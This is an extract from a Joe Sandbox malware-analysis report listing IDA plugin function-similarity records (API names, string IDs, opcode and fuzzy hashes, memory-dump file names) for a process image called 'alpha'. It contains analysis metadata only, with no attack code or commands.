                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue$CreateOpen
                                                      • String ID: %s=%s
                                                      • API String ID: 1019019434-1087296587
                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction ID: eeaca4c8d1d37fa740226598ca499e0b83d55dd0b0ec19b041cae7c1b70f8bb8
                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction Fuzzy Hash: AF51A531B0875296E760EB25A8467BAF7A1FB89791F81C236CA4D83790DFBCD442C711
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmpwcsrchr
                                                      • String ID: COPYCMD
                                                      • API String ID: 2429825313-3727491224
                                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                      • Instruction ID: e0d8cba298e07220c052894557b691163a1a4570f1a78a78668a82462d9fb5f6
                                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                      • Instruction Fuzzy Hash: 23F1B522F0864695FB60EF51A0427BDB3A1EB44798F804637CE5E136C4DFBCA555C362
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$FullNamePathwcsrchr
                                                      • String ID:
                                                      • API String ID: 4289998964-0
                                                      • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction ID: 46ebeda9c88c80cf5cf1044ef5107596b48eb29a0c16b1f0f72b54442335a940
                                                      • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction Fuzzy Hash: 14C1C311E0935692EFA4FB51954A779A3A0FB45B90F815632CE0E077D0DFBCA491C362
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                      • String ID:
                                                      • API String ID: 3476366620-0
                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                      • Instruction ID: 61091c97fbdea65749aa98a672f36d78fa8e0f68fef7e65103d4cb73476a8846
                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                      • Instruction Fuzzy Hash: 9521EE20D08A4296EB18FB1494173B8EA50FF4A71AFC49277D55F422E1DFBCA444C663
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                      • String ID: %9d
                                                      • API String ID: 1006866328-2241623522
                                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                      • Instruction ID: 47b18b95349bf7fb8436eb1feeca6d974d13b02191ef1ec6cc10948366a1c51f
                                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                      • Instruction Fuzzy Hash: 8C51D5B2A087429AF700EF10D8427A9B7A0FB08754F814636DA6D53795CFBCE554CB61
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction ID: 931aa7ff86b1b35f3231b549eb772980d6f29d3d8ec5840036c79809ba846e1b
                                                      • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction Fuzzy Hash: F9C1F562E0978296EB64EB20E852BF9A3A0FB94784F844536DA0F07794DFBCE551C311
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                      • Instruction ID: 8225d8928d15e572c5f685a649d042fab9f4bf782d230395d95721dcc981bf9d
                                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                      • Instruction Fuzzy Hash: 28A1C461A0968291EB14EB25A453BBAB6E0FF88780FD14137DD4F43795DEBCE811C722
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DiskFreeSpace
                                                      • String ID: %5lu
                                                      • API String ID: 2448137811-2100233843
                                                      • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                      • Instruction ID: 13569d7258be1140b1aa18b86f8d2f5a68dc31aefba02b4bcbbdbd1389165d2d
                                                      • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                      • Instruction Fuzzy Hash: D8418F22B08AC195EB65EF55E8417EAB360FB84789F808136EA4D4BB48DFBCD149C711
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 2081463915-1994581435
                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction ID: cec4c7b3183c80703036b39bd2b6680e02f83b4e6cb631473a830adaf79e0424
                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction Fuzzy Hash: 9D71BC20E08642A5FB64FB24A8867B9A6E0AF05759FC4453BD50F432A5DFFCA4918322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr
                                                      • String ID:
                                                      • API String ID: 1497570035-0
                                                      • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                      • Instruction ID: 6010ecb5c06d1797ac15fca347a8afbb8386b042ca2328e8d77af8896f9a1b0d
                                                      • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                      • Instruction Fuzzy Hash: 36C14661A0868292EB54FB11A4427B9E7A0FF88780F844537EA4F437D5DFBCE450C722
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                      • Instruction ID: 77257c7e2e045a3dbc0e2a7dcff853cce63b901284a409a2ad2f50d5f1b65008
                                                      • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                      • Instruction Fuzzy Hash: 54A10752B1825281EF24FB6994163B9E690AF45BF8FC44336DE6E477C4EEBCE4418321
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • _pipe.MSVCRT ref: 00007FF7E1DB6C1E
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB6CD1
                                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7E1DB6CFB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                      • String ID:
                                                      • API String ID: 624391571-0
                                                      • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                      • Instruction ID: ca85e1b4e2c54b7d86cbfabd58114207de8563b560593d4f6ff8c5f96b38b049
                                                      • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                      • Instruction Fuzzy Hash: 4B71D271A08A0296E714FF34D842778F691FF49754F84823ADA5E872D5CFBCE8518722
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                      • String ID:
                                                      • API String ID: 4268342597-0
                                                      • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                      • Instruction ID: 1b3605592f1654b132e93aac95c1baa87bb5cd7334e5772a3c104228f89042d5
                                                      • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                      • Instruction Fuzzy Hash: 46815022E0878281EB64EF25A442339B7A1FB55B84F884237D95D83754DFBCE480C7A2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: OpenToken$CloseProcessThread
                                                      • String ID:
                                                      • API String ID: 2991381754-0
                                                      • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                      • Instruction ID: 111c5bd72b23c5829098dab2dfb3297298cf2c82c97740267226ba76a37bc2c3
                                                      • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                      • Instruction Fuzzy Hash: DD210732B0864287E740EB54D4427BEFB60EB847B1F814236EB4943684DFBCD898CB12
                                                      APIs
                                                      • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E1DDC59E), ref: 00007FF7E1DB5879
                                                        • Part of subcall function 00007FF7E1DB58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DB5903
                                                        • Part of subcall function 00007FF7E1DB58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DB5943
                                                        • Part of subcall function 00007FF7E1DB58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DB5956
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValueVersion
                                                      • String ID: %d.%d.%05d.%d
                                                      • API String ID: 2996790148-3457777122
                                                      • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                      • Instruction ID: f197d266cc9998bd44454ac8a5c2bb2fbe253a80cc5916235325472b5e3adcf6
                                                      • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                      • Instruction Fuzzy Hash: 9BF0A072A0838197D310EF16B44116AEAA1FB88781F908139EA4A07B5ACF7CD554CB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 2831795651-0
                                                      • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                      • Instruction ID: df07049457d9ff05dbdcdc45b4132e565cf554b8878d2728d8f4a798ba011402
                                                      • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                      • Instruction Fuzzy Hash: E0D1F272A0868286E764EF25E4413FAB3A1FB447A4F905536DE4E07798CFBCE540C791
                                                      APIs
                                                      • memset.MSVCRT ref: 00007FF7E1DB7DA1
                                                        • Part of subcall function 00007FF7E1DC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC41AD
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DB7EB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                      • String ID:
                                                      • API String ID: 168394030-0
                                                      • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                      • Instruction ID: c448347729e5a6a54f5b16b3153142bfbf6cd3e87b29c1472dab64065c2a013c
                                                      • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                      • Instruction Fuzzy Hash: 79A12421F0865395FB24EB2598427BAA3A1FF85784F804136DD0E47AE4DFBCE441C362
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
